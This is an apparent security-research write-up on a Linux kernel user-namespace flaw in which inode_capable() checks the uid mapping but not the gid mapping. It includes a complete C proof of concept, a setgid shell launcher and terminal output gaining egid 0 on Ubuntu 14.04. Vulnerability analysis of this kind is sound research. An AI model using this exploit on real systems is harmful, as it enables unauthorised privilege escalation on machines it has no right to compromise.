The CLONE_NEWUSER
namespace was introduced in Linux 2.6.23 and completed in Linux 3.8 (and starting from 3.8, unprivileged processes can create user namespaces). It is used to isolate the user and group ID number spaces, i.e., a process's user and group IDs can be different inside and outside a user namespace. For example, a normal (unprivileged) process can create a namespace in which it has a uid
of 0.
Hence, a mapping from the user and group IDs inside a user namespace to a corresponding set of user and group IDs outside the namespace is required. This mapping allows the OS to perform the appropriate permission checks when a process in a user namespace performs operations that affect the system outside that namespace, e.g., file system access. However, a number of Linux filesystems are not yet "fully" user-namespace aware.
The bug is in incorrect use of the inode_capable()
that determines capabilities of the user or group. Let's take a look at the inode_change_ok()
function that uses inode_capable()
to check that the caller has sufficient privileges to perform chown, chgrp and chmod operations:
int inode_change_ok(const struct inode *inode, struct iattr *attr) { .... /* If force is set do it anyway. */ if (ia_valid & ATTR_FORCE) return 0; /* Make sure a caller can chown. */ if ((ia_valid & ATTR_UID) && (!uid_eq(current_fsuid(), inode->i_uid) || !uid_eq(attr->ia_uid, inode->i_uid)) && !inode_capable(inode, CAP_CHOWN)) return -EPERM; /* Make sure caller can chgrp. */ .... /* Make sure a caller can chmod. */ if (ia_valid & ATTR_MODE) { if (!inode_owner_or_capable(inode)) (1) return -EPERM; /* Also check the setgid bit! */ if (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid : inode->i_gid) && !inode_capable(inode, CAP_FSETID)) (2) attr->ia_mode &= ~S_ISGID; }
At (2), the inode_capable()
is called with CAP_FSETID
. The inode_capable()
is then supposed to check whether the caller is allowed to perform the chmod operation based on the mapping to uid
and gid
outside the namespace:
bool inode_capable(const struct inode *inode, int cap) { struct user_namespace *ns = current_user_ns(); return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid); (3) }
However, as can be seen at (3), the check is only performed for inode->i_uid
(and not for inode->i_gid
). What that means is that if we own a file as a non-privileged user (outside the namespace) with gid set to 0 (how can that happen?), we can set the setgid
bit on that file due to the missing inode->i_guid
check above. But yes, we do need to own (i.e., our uid
) the file in the first place because of the inode_owner_or_capable()
check at (1):
bool inode_owner_or_capable(const struct inode *inode) { if (uid_eq(current_fsuid(), inode->i_uid)) return true; if (inode_capable(inode, CAP_FOWNER)) return true; return false; }
The following PoC demonstrates the exploitation technique.
For this example, I'll be using Ubuntu 14.04:
vnik$ uname -a Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64
First, let's assume there is a file owned by us (vnik
) with gid of 0:
vnik$ id uid=1001(vnik) gid=1001(vnik) groups=1001(vnik) vnik$ ls -al test -rw-rw-r-- 1 vnik root 0 Jun 19 13:59 test
So, the gid
is root and there are no setuid
or setgid
bits set. Let's create a user namespace where our user is mapped to root.
#define _GNU_SOURCE #include <sys/wait.h> #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <limits.h> #include <string.h> #include <assert.h> #define STACK_SIZE (1024 * 1024) static char child_stack[STACK_SIZE]; struct args { int pipe_fd[2]; char *file_path; }; static int child(void *arg) { struct args *f_args = (struct args *)arg; char c; // close stdout close(f_args->pipe_fd[1]); assert(read(f_args->pipe_fd[0], &c, 1) == 0); // set the setgid bit chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); (5) return 0; } int main(int argc, char *argv[]) { int fd; pid_t pid; char mapping[1024]; char map_file[PATH_MAX]; struct args f_args; assert(argc == 2); f_args.file_path = argv[1]; // create a pipe for synching the child and parent assert(pipe(f_args.pipe_fd) != -1); pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); (3) assert(pid != -1); // get the current uid outside the namespace snprintf(mapping, 1024, "0 %d 1\n", getuid()); // update uid and gid maps in the child snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); fd = open(map_file, O_RDWR); assert(fd != -1); assert(write(fd, mapping, strlen(mapping)) == strlen(mapping)); (4) close(f_args.pipe_fd[1]); assert (waitpid(pid, NULL, 0) != -1); }
The above code creates a user namespace (3) with a mapping (4) for the current user (outside the namespace) to uid 0 (inside the namespace). The child process within the new namespace then sets the setgid bit (5) on the supplied file. Since there is no check for kgid_has_mapping(ns, inode->i_gid)
in inode_capable()
, we can set the setgid
bit on a file with an arbitrary gid value (even if we don't belong to that group outside the namespace). The above PoC can be downloaded from here.
vnik$ gcc poc.c -o poc
Let's now create a simple shell launcher that we'll use to overwrite the test
file:
vnik$ cat << EOF > shell.c int main() { setgid(0); execl("/bin/bash", "-sh", 0); } EOF vnik$ gcc shell.c -o shell vnik$ cp shell test && ls -al ./test -rw-r--r-- 1 vnik root 8564 Jun 20 13:20 test
Now that we've replaced the test file with our shell (preserving the gid
), let's set the setgid
bit:
vnik$ ./poc ./test vnik$ ls -al ./test -rwxr-s--- 1 vnik root 8564 Jun 20 13:20 test vnik$ ./test -sh-4.3$ id uid=1000(vnik) gid=1000(vnik) egid=0(root) groups=1000(vnik)
We have egid = 0
. Whoopty doo! Yes, we can now read and write files (that were previously only readable or writable by gid = 0
) but that does not directly lead to root.
The vulnerable kernel versions do not properly use the inode_capable()
in determining the user capabilities. A non-privileged user "may" be able to escalate privileges to root. However, good luck finding a file owned by your user with gid = 0
(or whatever gid
you're targeting). Once you get egid = 0
, what's next? Can we escalate this to root in a generic or distribution-specific way?